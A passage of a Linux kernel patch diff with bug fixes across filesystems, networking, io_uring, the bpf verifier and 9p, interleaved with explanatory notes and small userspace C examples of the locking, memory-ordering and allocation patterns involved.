+diff --git a/fs/ksmbd/transport_tcp.c b/fs/ksmbd/transport_tcp.c
+index 63d55f543bd2e..4c6bd0b699791 100644
+--- a/fs/ksmbd/transport_tcp.c
++++ b/fs/ksmbd/transport_tcp.c
+@@ -295,6 +295,7 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 	struct msghdr ksmbd_msg;
+ 	struct kvec *iov;
+ 	struct ksmbd_conn *conn = KSMBD_TRANS(t)->conn;
++	int max_retry = 2;
+ 
+ 	iov = get_conn_iovec(t, nr_segs);
+ 	if (!iov)
+@@ -321,9 +322,11 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 		} else if (conn->status == KSMBD_SESS_NEED_RECONNECT) {
+ 			total_read = -EAGAIN;
+ 			break;
+-		} else if (length == -ERESTARTSYS || length == -EAGAIN) {
++		} else if ((length == -ERESTARTSYS || length == -EAGAIN) &&
++			   max_retry) {
+ 			usleep_range(1000, 2000);
+ 			length = 0;
++			max_retry--;
+ 			continue;
+ 		} else if (length <= 0) {
+ 			total_read = -EAGAIN;
+diff --git a/fs/locks.c b/fs/locks.c
+index 607f94a0e789f..7dc129cc1a267 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -2669,6 +2669,29 @@ int vfs_cancel_lock(struct file *filp, struct file_lock *fl)
+ }
+ EXPORT_SYMBOL_GPL(vfs_cancel_lock);
+ 
++/**
++ * vfs_inode_has_locks - are any file locks held on @inode?
++ * @inode: inode to check for locks
++ *
++ * Return true if there are any FL_POSIX or FL_FLOCK locks currently
++ * set on @inode.
++ */
++bool vfs_inode_has_locks(struct inode *inode)
++{
++	struct file_lock_context *ctx;
++	bool ret;
++
++	ctx = smp_load_acquire(&inode->i_flctx);
++	if (!ctx)
++		return false;
++
++	spin_lock(&ctx->flc_lock);
++	ret = !list_empty(&ctx->flc_posix) || !list_empty(&ctx->flc_flock);
++	spin_unlock(&ctx->flc_lock);
++	return ret;
++}
++EXPORT_SYMBOL_GPL(vfs_inode_has_locks);
++
+ #ifdef CONFIG_PROC_FS
+ #include <linux/proc_fs.h>
+ #include <linux/seq_file.h>
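
The new vfs_inode_has_locks() above reads `inode->i_flctx` with smp_load_acquire(), pairing with the release store that publishes the context, so a reader never sees a half-initialised structure. A userspace analogue using C11 atomics; the names mirror the kernel ones, but this is not kernel API:

#include <stdatomic.h>
#include <stdbool.h>

struct lock_ctx { int posix_cnt; int flock_cnt; };

static _Atomic(struct lock_ctx *) i_flctx;

/* Writer: fully initialise, then publish with a release store. */
static void publish_ctx(struct lock_ctx *ctx)
{
	ctx->posix_cnt = 0;
	ctx->flock_cnt = 0;
	atomic_store_explicit(&i_flctx, ctx, memory_order_release);
}

/* Reader: acquire load guarantees the initialisation is visible. */
static bool inode_has_locks(void)
{
	struct lock_ctx *ctx =
		atomic_load_explicit(&i_flctx, memory_order_acquire);

	if (!ctx)
		return false;	/* no context yet: no locks were ever set */
	/* The kernel helper checks its lists under ctx->flc_lock. */
	return ctx->posix_cnt || ctx->flock_cnt;
}

int main(void)
{
	static struct lock_ctx ctx;

	publish_ctx(&ctx);
	return inode_has_locks();	/* 0: empty context */
}
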
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index bcfeb1a922c0d..78849646fe832 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -3570,6 +3570,17 @@ nfsd4_encode_dirent(void *ccdv, const char *name, int namlen,
+ 	case nfserr_noent:
+ 		xdr_truncate_encode(xdr, start_offset);
+ 		goto skip_entry;
++	case nfserr_jukebox:
++		/*
++		 * The pseudoroot should only display dentries that lead to
++		 * exports. If we get EJUKEBOX here, then we can't tell whether
++		 * this entry should be included. Just fail the whole READDIR
++		 * with NFS4ERR_DELAY in that case, and hope that the situation
++		 * will resolve itself by the client's next attempt.
++		 */
++		if (cd->rd_fhp->fh_export->ex_flags & NFSEXP_V4ROOT)
++			goto fail;
++		fallthrough;
+ 	default:
+ 		/*
+ 		 * If the client requested the RDATTR_ERROR attribute,
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index bfbd9f672f59e..8b1afde192118 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -447,8 +447,8 @@ static void nfsd_shutdown_net(struct net *net)
+ {
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+ 
+-	nfsd_file_cache_shutdown_net(net);
+ 	nfs4_state_shutdown_net(net);
++	nfsd_file_cache_shutdown_net(net);
+ 	if (nn->lockd_up) {
+ 		lockd_down(net);
+ 		nn->lockd_up = false;
+diff --git a/fs/ntfs3/file.c b/fs/ntfs3/file.c
+index 4f2ffc7ef296f..f31c0389a2e7d 100644
+--- a/fs/ntfs3/file.c
++++ b/fs/ntfs3/file.c
+@@ -486,10 +486,10 @@ static int ntfs_truncate(struct inode *inode, loff_t new_size)
+ 
+ 	new_valid = ntfs_up_block(sb, min_t(u64, ni->i_valid, new_size));
+ 
+-	ni_lock(ni);
+-
+ 	truncate_setsize(inode, new_size);
+ 
++	ni_lock(ni);
++
+ 	down_write(&ni->file.run_lock);
+ 	err = attr_set_size(ni, ATTR_DATA, NULL, 0, &ni->file.run, new_size,
+ 			    &new_valid, ni->mi.sbi->options->prealloc, NULL);
+diff --git a/fs/udf/inode.c b/fs/udf/inode.c
+index f713d108f21d3..e92a16435a29e 100644
+--- a/fs/udf/inode.c
++++ b/fs/udf/inode.c
+@@ -600,7 +600,7 @@ static void udf_do_extend_final_block(struct inode *inode,
+ 	 */
+ 	if (new_elen <= (last_ext->extLength & UDF_EXTENT_LENGTH_MASK))
+ 		return;
+-	added_bytes = (last_ext->extLength & UDF_EXTENT_LENGTH_MASK) - new_elen;
++	added_bytes = new_elen - (last_ext->extLength & UDF_EXTENT_LENGTH_MASK);
+ 	last_ext->extLength += added_bytes;
+ 	UDF_I(inode)->i_lenExtents += added_bytes;
+ 
+diff --git a/include/acpi/video.h b/include/acpi/video.h
+index a275c35e5249d..8ed9bec03e534 100644
+--- a/include/acpi/video.h
++++ b/include/acpi/video.h
+@@ -53,6 +53,7 @@ enum acpi_backlight_type {
+ };
+ 
+ #if IS_ENABLED(CONFIG_ACPI_VIDEO)
++extern void acpi_video_report_nolcd(void);
+ extern int acpi_video_register(void);
+ extern void acpi_video_unregister(void);
+ extern void acpi_video_register_backlight(void);
+@@ -69,6 +70,7 @@ extern int acpi_video_get_levels(struct acpi_device *device,
+ 				 struct acpi_video_device_brightness **dev_br,
+ 				 int *pmax_level);
+ #else
++static inline void acpi_video_report_nolcd(void) { return; }
+ static inline int acpi_video_register(void) { return -ENODEV; }
+ static inline void acpi_video_unregister(void) { return; }
+ static inline void acpi_video_register_backlight(void) { return; }
+diff --git a/include/drm/drm_plane_helper.h b/include/drm/drm_plane_helper.h
+index ff83d26216876..3a574e8cd22f4 100644
+--- a/include/drm/drm_plane_helper.h
++++ b/include/drm/drm_plane_helper.h
+@@ -26,6 +26,7 @@
+ 
+ #include <linux/types.h>
+ 
++struct drm_atomic_state;
+ struct drm_crtc;
+ struct drm_framebuffer;
+ struct drm_modeset_acquire_ctx;
+diff --git a/include/linux/dsa/tag_qca.h b/include/linux/dsa/tag_qca.h
+index b1b5720d89a59..ee657452f122a 100644
+--- a/include/linux/dsa/tag_qca.h
++++ b/include/linux/dsa/tag_qca.h
+@@ -45,8 +45,8 @@ struct sk_buff;
+ 					QCA_HDR_MGMT_COMMAND_LEN + \
+ 					QCA_HDR_MGMT_DATA1_LEN)
+ 
+-#define QCA_HDR_MGMT_DATA2_LEN		12 /* Other 12 byte for the mdio data */
+-#define QCA_HDR_MGMT_PADDING_LEN	34 /* Padding to reach the min Ethernet packet */
++#define QCA_HDR_MGMT_DATA2_LEN		28 /* Other 28 bytes for the mdio data */
++#define QCA_HDR_MGMT_PADDING_LEN	18 /* Padding to reach the min Ethernet packet */
+ 
+ #define QCA_HDR_MGMT_PKT_LEN		(QCA_HDR_MGMT_HEADER_LEN + \
+ 					QCA_HDR_LEN + \
+diff --git a/include/linux/efi.h b/include/linux/efi.h
+index 7603fc58c47cd..4aa1dbc7b0646 100644
+--- a/include/linux/efi.h
++++ b/include/linux/efi.h
+@@ -1170,8 +1170,6 @@ void efi_check_for_embedded_firmwares(void);
+ static inline void efi_check_for_embedded_firmwares(void) { }
+ #endif
+ 
+-efi_status_t efi_random_get_seed(void);
+-
+ #define arch_efi_call_virt(p, f, args...)	((p)->f(args))
+ 
+ /*
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 6b115bce14b98..081d1f539628b 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -1170,6 +1170,7 @@ extern int locks_delete_block(struct file_lock *);
+ extern int vfs_test_lock(struct file *, struct file_lock *);
+ extern int vfs_lock_file(struct file *, unsigned int, struct file_lock *, struct file_lock *);
+ extern int vfs_cancel_lock(struct file *filp, struct file_lock *fl);
++bool vfs_inode_has_locks(struct inode *inode);
+ extern int locks_lock_inode_wait(struct inode *inode, struct file_lock *fl);
+ extern int __break_lease(struct inode *inode, unsigned int flags, unsigned int type);
+ extern void lease_get_mtime(struct inode *, struct timespec64 *time);
+@@ -1284,6 +1285,11 @@ static inline int vfs_cancel_lock(struct file *filp, struct file_lock *fl)
+ 	return 0;
+ }
+ 
++static inline bool vfs_inode_has_locks(struct inode *inode)
++{
++	return false;
++}
++
+ static inline int locks_lock_inode_wait(struct inode *inode, struct file_lock *fl)
+ {
+ 	return -ENOLCK;
+diff --git a/include/linux/mlx5/device.h b/include/linux/mlx5/device.h
+index 1ff91cb79ded5..2383076a7306c 100644
+--- a/include/linux/mlx5/device.h
++++ b/include/linux/mlx5/device.h
+@@ -1085,6 +1085,11 @@ enum {
+ 	MLX5_VPORT_ADMIN_STATE_AUTO  = 0x2,
+ };
+ 
++enum {
++	MLX5_VPORT_CVLAN_INSERT_WHEN_NO_CVLAN  = 0x1,
++	MLX5_VPORT_CVLAN_INSERT_ALWAYS         = 0x3,
++};
++
+ enum {
+ 	MLX5_L3_PROT_TYPE_IPV4		= 0,
+ 	MLX5_L3_PROT_TYPE_IPV6		= 1,
+diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h
+index 5a4e914e2a6ff..e45bdec73baf1 100644
+--- a/include/linux/mlx5/mlx5_ifc.h
++++ b/include/linux/mlx5/mlx5_ifc.h
+@@ -907,7 +907,8 @@ struct mlx5_ifc_e_switch_cap_bits {
+ 	u8         vport_svlan_insert[0x1];
+ 	u8         vport_cvlan_insert_if_not_exist[0x1];
+ 	u8         vport_cvlan_insert_overwrite[0x1];
+-	u8         reserved_at_5[0x2];
++	u8         reserved_at_5[0x1];
++	u8         vport_cvlan_insert_always[0x1];
+ 	u8         esw_shared_ingress_acl[0x1];
+ 	u8         esw_uplink_ingress_acl[0x1];
+ 	u8         root_ft_on_other_esw[0x1];
+diff --git a/include/linux/netfilter/ipset/ip_set.h b/include/linux/netfilter/ipset/ip_set.h
+index ada1296c87d50..72f5ebc5c97a9 100644
+--- a/include/linux/netfilter/ipset/ip_set.h
++++ b/include/linux/netfilter/ipset/ip_set.h
+@@ -197,7 +197,7 @@ struct ip_set_region {
+ };
+ 
+ /* Max range where every element is added/deleted in one step */
+-#define IPSET_MAX_RANGE		(1<<20)
++#define IPSET_MAX_RANGE		(1<<14)
+ 
+ /* The max revision number supported by any set type + 1 */
+ #define IPSET_REVISION_MAX	9
+diff --git a/include/linux/sunrpc/rpc_pipe_fs.h b/include/linux/sunrpc/rpc_pipe_fs.h
+index cd188a527d169..3b35b6f6533aa 100644
+--- a/include/linux/sunrpc/rpc_pipe_fs.h
++++ b/include/linux/sunrpc/rpc_pipe_fs.h
+@@ -92,6 +92,11 @@ extern ssize_t rpc_pipe_generic_upcall(struct file *, struct rpc_pipe_msg *,
+ 				       char __user *, size_t);
+ extern int rpc_queue_upcall(struct rpc_pipe *, struct rpc_pipe_msg *);
+ 
++/* returns true if the msg is in-flight, i.e., already eaten by the peer */
++static inline bool rpc_msg_is_inflight(const struct rpc_pipe_msg *msg) {
++	return (msg->copied != 0 && list_empty(&msg->list));
++}
++
+ struct rpc_clnt;
+ extern struct dentry *rpc_create_client_dir(struct dentry *, const char *, struct rpc_clnt *);
+ extern int rpc_remove_client_dir(struct rpc_clnt *);
+diff --git a/include/net/inet_hashtables.h b/include/net/inet_hashtables.h
+index 69174093078f0..99bd823e97f62 100644
+--- a/include/net/inet_hashtables.h
++++ b/include/net/inet_hashtables.h
+@@ -108,6 +108,10 @@ struct inet_bind2_bucket {
+ 	struct hlist_node	node;
+ 	/* List of sockets hashed to this bucket */
+ 	struct hlist_head	owners;
++	/* bhash keeps twsk in owners, but bhash2 keeps twsk in
++	 * deathrow, to avoid adding a member to struct sock_common.
++	 */
++	struct hlist_head	deathrow;
+ };
+ 
+ static inline struct net *ib_net(const struct inet_bind_bucket *ib)
+diff --git a/include/net/inet_timewait_sock.h b/include/net/inet_timewait_sock.h
+index 5b47545f22d39..4a8e578405cb3 100644
+--- a/include/net/inet_timewait_sock.h
++++ b/include/net/inet_timewait_sock.h
+@@ -73,9 +73,14 @@ struct inet_timewait_sock {
+ 	u32			tw_priority;
+ 	struct timer_list	tw_timer;
+ 	struct inet_bind_bucket	*tw_tb;
++	struct inet_bind2_bucket	*tw_tb2;
++	struct hlist_node		tw_bind2_node;
+ };
+ #define tw_tclass tw_tos
+ 
++#define twsk_for_each_bound_bhash2(__tw, list) \
++	hlist_for_each_entry(__tw, list, tw_bind2_node)
++
+ static inline struct inet_timewait_sock *inet_twsk(const struct sock *sk)
+ {
+ 	return (struct inet_timewait_sock *)sk;
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index cdb7db9b0e252..1daededfa75ed 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -311,17 +311,29 @@ struct nft_set_iter {
+ /**
+  *	struct nft_set_desc - description of set elements
+  *
++ *	@ktype: key type
+  *	@klen: key length
++ *	@dtype: data type
+  *	@dlen: data length
++ *	@objtype: object type
++ *	@flags: flags
+  *	@size: number of set elements
++ *	@policy: set policy
++ *	@gc_int: garbage collector interval
+  *	@field_len: length of each field in concatenation, bytes
+  *	@field_count: number of concatenated fields in element
+  *	@expr: set must support for expressions
+  */
+ struct nft_set_desc {
++	u32			ktype;
+ 	unsigned int		klen;
++	u32			dtype;
+ 	unsigned int		dlen;
++	u32			objtype;
+ 	unsigned int		size;
++	u32			policy;
++	u32			gc_int;
++	u64			timeout;
+ 	u8			field_len[NFT_REG32_COUNT];
+ 	u8			field_count;
+ 	bool			expr;
+@@ -580,7 +592,9 @@ void *nft_set_catchall_gc(const struct nft_set *set);
+ 
+ static inline unsigned long nft_set_gc_interval(const struct nft_set *set)
+ {
+-	return set->gc_int ? msecs_to_jiffies(set->gc_int) : HZ;
++	u32 gc_int = READ_ONCE(set->gc_int);
++
++	return gc_int ? msecs_to_jiffies(gc_int) : HZ;
+ }
+ 
+ /**
+@@ -1551,6 +1565,9 @@ struct nft_trans_rule {
+ struct nft_trans_set {
+ 	struct nft_set			*set;
+ 	u32				set_id;
++	u32				gc_int;
++	u64				timeout;
++	bool				update;
+ 	bool				bound;
+ };
+ 
+@@ -1560,6 +1577,12 @@ struct nft_trans_set {
+ 	(((struct nft_trans_set *)trans->data)->set_id)
+ #define nft_trans_set_bound(trans)	\
+ 	(((struct nft_trans_set *)trans->data)->bound)
++#define nft_trans_set_update(trans)	\
++	(((struct nft_trans_set *)trans->data)->update)
++#define nft_trans_set_timeout(trans)	\
++	(((struct nft_trans_set *)trans->data)->timeout)
++#define nft_trans_set_gc_int(trans)	\
++	(((struct nft_trans_set *)trans->data)->gc_int)
+ 
+ struct nft_trans_chain {
+ 	bool				update;
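
The READ_ONCE() in nft_set_gc_interval() above pairs with the WRITE_ONCE()
updates in the nf_tables commit path later in this patch: gc_int can now
change while a reader computes the interval, so the value is snapshotted once
instead of being loaded twice. A compile-able sketch of the pattern, with
stand-in READ_ONCE()/HZ/msecs_to_jiffies() definitions (assumptions, not the
kernel's):

#include <stdint.h>
#include <stdio.h>

#define READ_ONCE(x)	(*(const volatile typeof(x) *)&(x))
#define HZ		100	/* pretend tick rate */

static unsigned long msecs_to_jiffies(uint32_t ms)
{
	return ms / (1000 / HZ);
}

struct set { uint32_t gc_int; };	/* updated concurrently elsewhere */

/* Old shape: two separate loads of set->gc_int. With a concurrent
 * WRITE_ONCE() updater, the test may see one value and the conversion
 * another (or the compiler may re-load or tear the access). */
static unsigned long gc_interval_racy(const struct set *s)
{
	return s->gc_int ? msecs_to_jiffies(s->gc_int) : HZ;
}

/* New shape, as in nft_set_gc_interval(): snapshot once, use the local. */
static unsigned long gc_interval(const struct set *s)
{
	uint32_t gc_int = READ_ONCE(s->gc_int);

	return gc_int ? msecs_to_jiffies(gc_int) : HZ;
}

int main(void)
{
	struct set s = { .gc_int = 2000 };

	printf("%lu %lu\n", gc_interval_racy(&s), gc_interval(&s));
	return 0;
}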
+diff --git a/io_uring/cancel.c b/io_uring/cancel.c
+index 2291a53cdabd1..b4f5dfacc0c31 100644
+--- a/io_uring/cancel.c
++++ b/io_uring/cancel.c
+@@ -288,24 +288,23 @@ int io_sync_cancel(struct io_ring_ctx *ctx, void __user *arg)
+ 
+ 		ret = __io_sync_cancel(current->io_uring, &cd, sc.fd);
+ 
++		mutex_unlock(&ctx->uring_lock);
+ 		if (ret != -EALREADY)
+ 			break;
+ 
+-		mutex_unlock(&ctx->uring_lock);
+ 		ret = io_run_task_work_sig(ctx);
+-		if (ret < 0) {
+-			mutex_lock(&ctx->uring_lock);
++		if (ret < 0)
+ 			break;
+-		}
+ 		ret = schedule_hrtimeout(&timeout, HRTIMER_MODE_ABS);
+-		mutex_lock(&ctx->uring_lock);
+ 		if (!ret) {
+ 			ret = -ETIME;
+ 			break;
+ 		}
++		mutex_lock(&ctx->uring_lock);
+ 	} while (1);
+ 
+ 	finish_wait(&ctx->cq_wait, &wait);
++	mutex_lock(&ctx->uring_lock);
+ 
+ 	if (ret == -ENOENT || ret > 0)
+ 		ret = 0;
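
The io_uring/cancel.c reordering above ensures ctx->uring_lock is never held
across io_run_task_work_sig() or schedule_hrtimeout(), and is re-taken exactly
once after the loop on every exit path. The same locking shape, transplanted
onto pthreads with made-up stand-ins (try_cancel(), wait_for_events()) for the
io_uring internals:

#include <errno.h>
#include <pthread.h>
#include <stdio.h>
#include <unistd.h>

static pthread_mutex_t uring_lock = PTHREAD_MUTEX_INITIALIZER;
static int attempts;

static int try_cancel(void)		/* runs with uring_lock held */
{
	return ++attempts < 3 ? -EALREADY : 0;
}

static int wait_for_events(void)	/* must run unlocked */
{
	usleep(1000);
	return 0;
}

/* The fixed shape: never sleep with the lock held, drop it on every
 * path out of the loop, and re-take it exactly once afterwards. */
static int sync_cancel(void)
{
	int ret;

	pthread_mutex_lock(&uring_lock);
	do {
		ret = try_cancel();

		pthread_mutex_unlock(&uring_lock);
		if (ret != -EALREADY)
			break;

		if (wait_for_events() < 0)
			break;
		pthread_mutex_lock(&uring_lock);	/* retry needs it */
	} while (1);

	pthread_mutex_lock(&uring_lock);
	/* caller expects the lock held here, as in io_sync_cancel() */
	pthread_mutex_unlock(&uring_lock);
	return ret;
}

int main(void)
{
	printf("cancel returned %d after %d attempts\n",
	       sync_cancel(), attempts);
	return 0;
}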
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 71f1cabb9f3d4..cea5de98c4232 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1109,13 +1109,18 @@ static void io_req_local_work_add(struct io_kiocb *req)
+ {
+ 	struct io_ring_ctx *ctx = req->ctx;
+ 
+-	if (!llist_add(&req->io_task_work.node, &ctx->work_llist))
++	percpu_ref_get(&ctx->refs);
++
++	if (!llist_add(&req->io_task_work.node, &ctx->work_llist)) {
++		percpu_ref_put(&ctx->refs);
+ 		return;
++	}
+ 	/* need it for the following io_cqring_wake() */
+ 	smp_mb__after_atomic();
+ 
+ 	if (unlikely(atomic_read(&req->task->io_uring->in_idle))) {
+ 		io_move_task_work_from_local(ctx);
++		percpu_ref_put(&ctx->refs);
+ 		return;
+ 	}
+ 
+@@ -1125,6 +1130,7 @@ static void io_req_local_work_add(struct io_kiocb *req)
+ 	if (ctx->has_evfd)
+ 		io_eventfd_signal(ctx);
+ 	__io_cqring_wake(ctx);
++	percpu_ref_put(&ctx->refs);
+ }
+ 
+ static inline void __io_req_task_work_add(struct io_kiocb *req, bool allow_local)
+@@ -2358,7 +2364,7 @@ int io_run_task_work_sig(struct io_ring_ctx *ctx)
+ /* when returns >0, the caller should retry */
+ static inline int io_cqring_wait_schedule(struct io_ring_ctx *ctx,
+ 					  struct io_wait_queue *iowq,
+-					  ktime_t timeout)
++					  ktime_t *timeout)
+ {
+ 	int ret;
+ 	unsigned long check_cq;
+@@ -2376,7 +2382,7 @@ static inline int io_cqring_wait_schedule(struct io_ring_ctx *ctx,
+ 		if (check_cq & BIT(IO_CHECK_CQ_DROPPED_BIT))
+ 			return -EBADR;
+ 	}
+-	if (!schedule_hrtimeout(&timeout, HRTIMER_MODE_ABS))
++	if (!schedule_hrtimeout(timeout, HRTIMER_MODE_ABS))
+ 		return -ETIME;
+ 	return 1;
+ }
+@@ -2446,7 +2452,7 @@ static int io_cqring_wait(struct io_ring_ctx *ctx, int min_events,
+ 		}
+ 		prepare_to_wait_exclusive(&ctx->cq_wait, &iowq.wq,
+ 						TASK_INTERRUPTIBLE);
+-		ret = io_cqring_wait_schedule(ctx, &iowq, timeout);
++		ret = io_cqring_wait_schedule(ctx, &iowq, &timeout);
+ 		cond_resched();
+ 	} while (ret > 0);
+ 
+@@ -3897,8 +3903,6 @@ static int __io_uring_register(struct io_ring_ctx *ctx, unsigned opcode,
+ 		return -EEXIST;
+ 
+ 	if (ctx->restricted) {
+-		if (opcode >= IORING_REGISTER_LAST)
+-			return -EINVAL;
+ 		opcode = array_index_nospec(opcode, IORING_REGISTER_LAST);
+ 		if (!test_bit(opcode, ctx->restrictions.register_op))
+ 			return -EACCES;
+@@ -4054,6 +4058,9 @@ SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode,
+ 	long ret = -EBADF;
+ 	struct fd f;
+ 
++	if (opcode >= IORING_REGISTER_LAST)
++		return -EINVAL;
++
+ 	f = fdget(fd);
+ 	if (!f.file)
+ 		return -EBADF;
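
In the __io_uring_register() hunk the opcode bounds check moves out to the
syscall entry, before fdget(), while the restricted path keeps
array_index_nospec() so that a speculated out-of-bounds opcode still cannot
index the restriction bitmap. A rough userspace rendition of the generic
(non-asm) mask that array_index_nospec() builds on -- an approximation of the
generic fallback, minus the optimizer barrier the real one carries:

#include <stdio.h>

#define BITS_PER_LONG (8 * sizeof(long))
#define OP_LAST 16UL

/* Approximation of the kernel's generic array_index_mask_nospec():
 * ~0UL when index < size, 0 otherwise, computed without a forward
 * branch the CPU could speculate past.  (Arithmetic right shift of a
 * negative value relies on the usual sign-extending gcc/clang
 * behaviour, as the kernel's generic version does.) */
static unsigned long index_mask_nospec(unsigned long index,
				       unsigned long size)
{
	return ~(long)(index | (size - 1UL - index)) >> (BITS_PER_LONG - 1);
}

static int handle(unsigned long opcode)
{
	/* 1. architectural check, now done before any fdget()-like work */
	if (opcode >= OP_LAST)
		return -1;
	/* 2. clamp the index used for the lookup even under
	 *    misspeculation, as the restricted path still does */
	opcode &= index_mask_nospec(opcode, OP_LAST);
	return (int)opcode;	/* table[opcode] would be safe here */
}

int main(void)
{
	printf("%d %d\n", handle(3), handle(99));
	return 0;
}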
+diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
+index bf0906e1e2b97..f1504cb5b6e19 100644
+--- a/kernel/bpf/trampoline.c
++++ b/kernel/bpf/trampoline.c
+@@ -489,6 +489,10 @@ again:
+ 		/* reset fops->func and fops->trampoline for re-register */
+ 		tr->fops->func = NULL;
+ 		tr->fops->trampoline = 0;
++
++		/* reset im->image memory attr for arch_prepare_bpf_trampoline */
++		set_memory_nx((long)im->image, 1);
++		set_memory_rw((long)im->image, 1);
+ 		goto again;
+ 	}
+ #endif
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 242fe307032f1..b4d5b343c1912 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -1000,6 +1000,8 @@ static void print_insn_state(struct bpf_verifier_env *env,
+  */
+ static void *copy_array(void *dst, const void *src, size_t n, size_t size, gfp_t flags)
+ {
++	size_t alloc_bytes;
++	void *orig = dst;
+ 	size_t bytes;
+ 
+ 	if (ZERO_OR_NULL_PTR(src))
+@@ -1008,11 +1010,11 @@ static void *copy_array(void *dst, const void *src, size_t n, size_t size, gfp_t
+ 	if (unlikely(check_mul_overflow(n, size, &bytes)))
+ 		return NULL;
+ 
+-	if (ksize(dst) < ksize(src)) {
+-		kfree(dst);
+-		dst = kmalloc_track_caller(kmalloc_size_roundup(bytes), flags);
+-		if (!dst)
+-			return NULL;
++	alloc_bytes = max(ksize(orig), kmalloc_size_roundup(bytes));
++	dst = krealloc(orig, alloc_bytes, flags);
++	if (!dst) {
++		kfree(orig);
++		return NULL;
+ 	}
+ 
+ 	memcpy(dst, src, bytes);
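
The verifier's copy_array() rework above replaces the kfree()+kmalloc() pair
with krealloc(), which preserves the old contents on success but -- like
userspace realloc() -- leaves the old block allocated on failure, so the
failure path must free it. A userspace analogue of the fixed shape (the
overflow check is a stand-in for check_mul_overflow(); illustrative only):

#include <stdint.h>
#include <stdlib.h>
#include <string.h>

static void *copy_array(void *dst, const void *src, size_t n, size_t size)
{
	void *orig = dst;
	size_t bytes;

	if (!src || !n || !size)
		return dst;

	if (n > SIZE_MAX / size)	/* check_mul_overflow() stand-in */
		return NULL;
	bytes = n * size;

	dst = realloc(orig, bytes);	/* keeps old contents on success */
	if (!dst) {
		free(orig);		/* realloc failure does not free */
		return NULL;
	}
	memcpy(dst, src, bytes);
	return dst;
}

int main(void)
{
	int src[4] = { 1, 2, 3, 4 };
	int *dst = copy_array(NULL, src, 4, sizeof(int));
	int ok = dst != NULL;

	free(dst);
	return !ok;
}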
+diff --git a/lib/kunit/string-stream.c b/lib/kunit/string-stream.c
+index a608746020a99..7aeabe1a3dc52 100644
+--- a/lib/kunit/string-stream.c
++++ b/lib/kunit/string-stream.c
+@@ -23,8 +23,10 @@ static struct string_stream_fragment *alloc_string_stream_fragment(
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	frag->fragment = kunit_kmalloc(test, len, gfp);
+-	if (!frag->fragment)
++	if (!frag->fragment) {
++		kunit_kfree(test, frag);
+ 		return ERR_PTR(-ENOMEM);
++	}
+ 
+ 	return frag;
+ }
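
The string-stream fix above is the classic partial-allocation unwind: when
the second allocation fails, the first must be released before returning,
rather than lingering until kunit reclaims test-managed allocations at the
end of the test case. The same shape with plain malloc()/free():

#include <stdlib.h>

struct fragment {
	char *buf;
};

static struct fragment *alloc_fragment(size_t len)
{
	struct fragment *frag = malloc(sizeof(*frag));

	if (!frag)
		return NULL;

	frag->buf = malloc(len);
	if (!frag->buf) {
		free(frag);	/* unwind the partial allocation */
		return NULL;
	}
	return frag;
}

int main(void)
{
	struct fragment *f = alloc_fragment(64);

	if (f) {
		free(f->buf);
		free(f);
	}
	return 0;
}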
+diff --git a/net/9p/client.c b/net/9p/client.c
+index b554f8357f967..b5aa25f82b78d 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -443,7 +443,7 @@ void p9_client_cb(struct p9_client *c, struct p9_req_t *req, int status)
+ 	 * the status change is visible to another thread
+ 	 */
+ 	smp_wmb();
+-	req->status = status;
++	WRITE_ONCE(req->status, status);
+ 
+ 	wake_up(&req->wq);
+ 	p9_debug(P9_DEBUG_MUX, "wakeup: %d\n", req->tc.tag);
+@@ -605,7 +605,7 @@ static int p9_client_flush(struct p9_client *c, struct p9_req_t *oldreq)
+ 	/* if we haven't received a response for oldreq,
+ 	 * remove it from the list
+ 	 */
+-	if (oldreq->status == REQ_STATUS_SENT) {
++	if (READ_ONCE(oldreq->status) == REQ_STATUS_SENT) {
+ 		if (c->trans_mod->cancelled)
+ 			c->trans_mod->cancelled(c, oldreq);
+ 	}
+@@ -702,7 +702,8 @@ p9_client_rpc(struct p9_client *c, int8_t type, const char *fmt, ...)
+ 	}
+ again:
+ 	/* Wait for the response */
+-	err = wait_event_killable(req->wq, req->status >= REQ_STATUS_RCVD);
++	err = wait_event_killable(req->wq,
++				  READ_ONCE(req->status) >= REQ_STATUS_RCVD);
+ 
+ 	/* Make sure our req is coherent with regard to updates in other
+ 	 * threads - echoes to wmb() in the callback
+@@ -716,7 +717,7 @@ again:
+ 		goto again;
+ 	}
+ 
+-	if (req->status == REQ_STATUS_ERROR) {
++	if (READ_ONCE(req->status) == REQ_STATUS_ERROR) {
+ 		p9_debug(P9_DEBUG_ERROR, "req_status error %d\n", req->t_err);
+ 		err = req->t_err;
+ 	}
+@@ -729,7 +730,7 @@ again:
+ 			p9_client_flush(c, req);
+ 
+ 		/* if we received the response anyway, don't signal error */
+-		if (req->status == REQ_STATUS_RCVD)
++		if (READ_ONCE(req->status) == REQ_STATUS_RCVD)
+ 			err = 0;
+ 	}
+ recalc_sigpending:
+@@ -798,7 +799,7 @@ static struct p9_req_t *p9_client_zc_rpc(struct p9_client *c, int8_t type,
+ 		if (err != -ERESTARTSYS)
+ 			goto recalc_sigpending;
+ 	}
+-	if (req->status == REQ_STATUS_ERROR) {
